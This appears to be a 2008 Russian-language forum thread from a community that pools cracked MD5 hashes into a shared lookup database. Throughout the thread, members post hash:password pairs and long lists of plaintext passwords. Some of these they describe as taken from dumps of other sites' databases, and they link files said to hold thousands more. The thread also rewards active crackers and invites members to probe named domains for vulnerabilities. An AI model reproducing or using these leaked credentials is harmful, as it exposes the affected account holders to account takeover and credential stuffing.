проверьте список хешей на очереди, чтобы юзеры зря не брутили их, как я(
-=lebed=-
07.01.2008, 17:43
В списке на http://antichat-md5-crack.bolnoy.com/cgi-bin/noncrack_md5.php есть по крайней мере 4 хеша уже имеющихся в вашей базе вот они:
3c3ec3259487d423405de34c538f1625:mmrtm30
daf81449b273c03242da8e2944498490:td2249
7c30cf8313e5259d28801bbf78fe1baf:trebor3
9843a25b198eb2429d48e74dfc1a7d48:25318991
проверьте список хешей на очереди, чтобы юзеры зря не брутили их, как я(
Всё ок, этих хэшей нет в очереди, просто надо обновить страницу...
ЗЫ после добавления паролей к этим хэшам они исключаются из очереди...
Только вчера они были.)
Нужно ли брутить хеши стоящие в очереди тут http://md5.xek.cc/noncrack.php ?
-=lebed=-
07.01.2008, 17:46
Только вчера они были.)
Ну пассы добавили - теперь их нет, я ничего вручную в базе не трогал...
-=lebed=-
07.01.2008, 17:49
Только вчера они были.)
Нужно ли брутить хеши стоящие в очереди тут http://md5.xek.cc/noncrack.php ?
Ну да, только эти же хэши могут быть и на старом сервисе. Базы там и там разные и не коим образом щас не связаны, кроме как тем что большинство пассов есть как в одной так и в другой...
halkfild
07.01.2008, 17:50
1.
уникальных паролей добавлено в базу: 17
неуникальных паролей: 6
простых паролей: 0 спасибо.
2. как вы видели раньше, я говорил что самые активные брутеры хешей будут получать номерки, на этом промежуточном этапе получает номерок grishka в виду его активности по нашему проекту.
еще хотелось бы отметить ElteRUS, CraZy_R, Tiler2k, wers, dimon222 немного активнее и вы тоже получите свой бонус
ну а самый активный получает 7-хуз инвиз 3613333 /* стучись в ПМ, получишь пароль */
отдельную благодарность выносим blackyb за номерки :D и вообще он очень много помогает материально проекту СПС!!!
3. мне в пм стучался x13 с hashkiller.com и предлагал добавить его сервис в наш парс . это будет сделано в ближайшие дни /*вот только сдам курсовую и экзамен =\ */
Ну пассы добавили - теперь их нет, я ничего вручную в базе не трогал...
Я ступил, когда я проверял пассы от хешей которые расшифровал видимо сервис их перевел в md5 сравнил, обнаружил что такие хеши стоят в очереди и добавил в базу.
А что делать с расшифрованными пассами с
http://md5.xek.cc/noncrack.php, сюда выкладывать или также проверить найденные пароли на этом и http://antichat-md5-crack.bolnoy.com/cgi-bin/noncrack_md5.php сервисах, чтобы сервис сам их добавил?
-=lebed=-
07.01.2008, 18:25
выкладывай пассы сюда, мы добавим...
Хеши расшифрованные с http://md5.xek.cc/noncrack.php:
18.06.1988
silentscream
3saw8q
sila05
O7G
c200ot
kabat0
12549285
t300mt
laman1983
cjnhelybxtcndj
Ghtktcnm
30091967
163757146
84014700
x1k2d3
45s54d
9eebb6
ace21aa
fuctura
cказали только пассы кидать!
http://elterripperd.onep.ru/res_5.txt
пароли из базы забугорного блога.
Хеши расшифрованные с http://md5.xek.cc/noncrack.php:
p1a5t1c
779fbfd
rpcgyqd
aa713fh
iriuiri
petutok
4prn6dm
1017nem
040658m
jjokker
ad040ks
5c694c0
09f75c0
n091830
kasiaj1
malwis1
nemva01
f202032
fb74fb3
lad2323
rbc4224
aaa5454
213bd64
moto635
proevo6
1281a86
halkfild
08.01.2008, 00:27
2 Momiji:
уникальных паролей добавлено в базу: 26
неуникальных паролей: 0
простых паролей: 0 спасибо.
спс.. работаем дальше ;)
2. добавил http://hashkiller.com
тестируем.. пишем о багах))
з.ы. скорее бы закончилась сессия и тд =\\\
ElteRUS,
уникальных паролей добавлено в базу: 1050 неуникальных паролей: 314 спасибо.
-=lebed=-
08.01.2008, 14:06
Угнан аккуант хозяина от bolnoy.com, оставил сообщение:
может я не хекер, но ты точно профан!!! =)
Не знаю связано ли это с как-то с сервисом antichat-md5-crack.bolnoy.com
или с владельцем, я думаю скорее второе...
IP не хекера 213.228.127.179, взлом он осуществил сегодня после 2 ночи...
Сегодня он вышел на контакт с владельцем и вернул ему пасс...
Контроль за сервисом и его работоспособность восстановлена...
Если хотите помочь, проверьте домены на уязвимости:
rap-live.ru
rap-arena.ru
joom-service.com
bolnoy.com
antichat-md5-crack.bolnoy.com
Еще немного пасов с баз разных ресурсов
http://elterripperd.onep.ru/res_6.txt
http://elterripperd.onep.ru/res_7.txt
2606 паролей из базы блога
http://md5.xek.cc/noncrack.php
ewq9898
1sakic9
vader09
slave99
887a599
mk&
c,clc
1@@Hr
H1cC0
3dPsqF
ChelGU
harleY
Nomack
cigicigi
hellsgate
janjao
wztfof
afrafr
vekmns
aczstw
sirsly
walhala
rpcgyqd
weetard
paijose
caspete
orzelki
izgilik
wtfchen
smasdsu
Тут могут быть повторки с предыдущими, путаница тут небольшая потому что видимо обновили список не расшифрованных хешей
halkfild
09.01.2008, 00:55
2 Momiji
уникальных паролей добавлено в базу: 27
неуникальных паролей: 3
ElteRUS спасибо на много паролей пополнилась база
з.ы. расшифровуйте да дадим еще 7-рок хуз :D
-=lebed=-
09.01.2008, 02:22
212211 - пассов красивая циферка, интересно скока такая шоха стоит?
PS Тут не отвечайте, щас кину на оценку... ;)
нужно до кривой девятки дойти))
ЗЫ: ща поставил гибрид , ждите результатов, сегодня не мой день , вабще настроения небыло(
-=lebed=-
09.01.2008, 02:28
нужно до кривой девятки дойти))
ЗЫ: ща поставил гибрид , ждите результатов, сегодня не мой день , вабще настроения небыло(
Завтра гляну что там у мну на работе с таблицами, 14 дней сервак молотил... наверно закончил...
384a9b482e96700213549e705be35701:t33nwolf
http://md5.xek.cc/noncrack.php
U1W03
d34c3a
HQRj1B
A165hh
даггер
ф2с4и7
a5488m
04377a7
06079016
066395914
11213141
11735ed
12001272
14161023
17011002
18047373
1dimat
1stkn1ght
20rafael
22041500
24253536
29291980
30219710
330274975
40187847
4lv4r0
5484a6
68644641
6b8431
769432105
887a599
9133808
97950465
99683587
CANON250
Jawal1969
Marcin3k
Scorpion666
Wfptc2007
a5488m
aczstw
afrafr
ana1993
borybory
cabral08
casa876
caspete
chamber#1
charmander4
clon12
cpd2256
cvaticano
d11m12
d18d19
d34c3a
dbb6537
dmcentre
dpxb59
elvis2006
esfpc!
eu1978
ewq9898
fenap321
g0k666
gsrtf123
haslo123qwe
izgilik
janjao
kamil098
katerini1
kia1983
kkk839
kueka007
lena1951
lrpc16
lukasz89
meloly1
miki231
mpo527
nikon4me
orzelki
p0pc0rn1
paijose
patriots12
pawelek17
pegaso38
psp-bg
qwe3321
r2tvdr
radar999
rfgexbyj
sirsly
slave99
smasdsu
sup3rc0w
vader09
vekmns
walhala
weetard
win513
wtfchen
wztfof
you12345
даггер
Уже где-то писал: бессмысленно в базу совать пароли из цифр длиной до 9 символов включительно. Они отлично брутятся в пасспро, причем довольно быстро.
А их никто и не сует.
2. В нашей базе содержатся уникальные пароли, отсутствуют хэши простых паролей,а именно:
а) состоящие только из цифр (1-8 символов);
б) состоящие только из маленьких латинских букв (1-6 символов);
в) состоящие только из заглавных латинских букв (1-6 символов);
г) из любых символов длинной менее и равной 4 символам.
В этой темы выкладывают пароли из дампов баз различных ресурсов и результаты брута хешей из http://md5.xek.cc/noncrack.php
----------------------------------------------------------------------
http://elterripperd.onep.ru/res_8.txt
1716 паролей
halkfild
09.01.2008, 17:49
2grishka
уникальных паролей добавлено в базу: 78
неуникальных паролей: 19
простых паролей: 0 спасибо.
2 ElteRUS
уникальных паролей добавлено в базу: 288
неуникальных паролей: 82
простых паролей: 286 спасибо.
уникальных паролей добавлено в базу: 246
неуникальных паролей: 52
простых паролей: 304 спасибо.
p.s. работем дальше.. скоро буду еще бонусы ;)
http://elterripperd.onep.ru/res_9.txt
2258 паролей из баз разных сайтов
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot